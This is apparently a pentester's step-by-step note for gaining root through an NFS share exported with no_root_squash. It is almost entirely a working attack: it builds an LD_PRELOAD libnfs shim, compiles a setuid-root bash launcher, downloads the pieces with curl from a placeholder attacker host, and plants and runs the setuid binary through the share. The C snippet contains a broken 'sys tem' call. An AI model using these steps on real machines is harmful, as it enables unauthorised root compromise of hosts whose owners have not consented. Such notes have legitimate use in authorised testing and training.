tcp/2049 NFS no_root_squash/no_all_squash misconfiguration PE
> showmount -e 127.0.0.1
Export list for 127.0.0.1:
/srv/Share 127.0.0.1/32,10.1.1.0/24
> cat /etc/exports
/srv/Share 10.1.1.0/24(insecure,rw)
/srv/Share 127.0.0.1/32(`no_root_squash`,`insecure`,rw)
> ./bootstrap
> ./configure
> make
> gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/
- create a simple exploit
pwn.c
and compile, gcc pwn.c -o pwn
int main(void){setreuid(0,0); sys tem("/bin/bash"); return 0;}
- Transfer the compiled example (i.e
ld_nfs.so
), exploit (i.e pwn
) and another two libraries (i.e libnfs.so
, libnfs.so.13
) in the lib/.lib
folder to the target
> curl http://<ip>/pwn --output pwn
> curl http://<ip>/ld_nfs.so --output ld_nfs.so
> curl http://<ip>/libnfs.so --output libnfs.so
> curl http://<ip>/libnfs.so.13 --output libnfs.so.13
- prepare the exploit and run
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so cp pwn nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chown root: nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://127.0.0.1/srv/Share/pwn
> LD_NFS_UID=0 LD_LIBRARY_PATH=/home/megan/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://127.0.0.1/srv/Share/pwn
> /srv/Share/pwn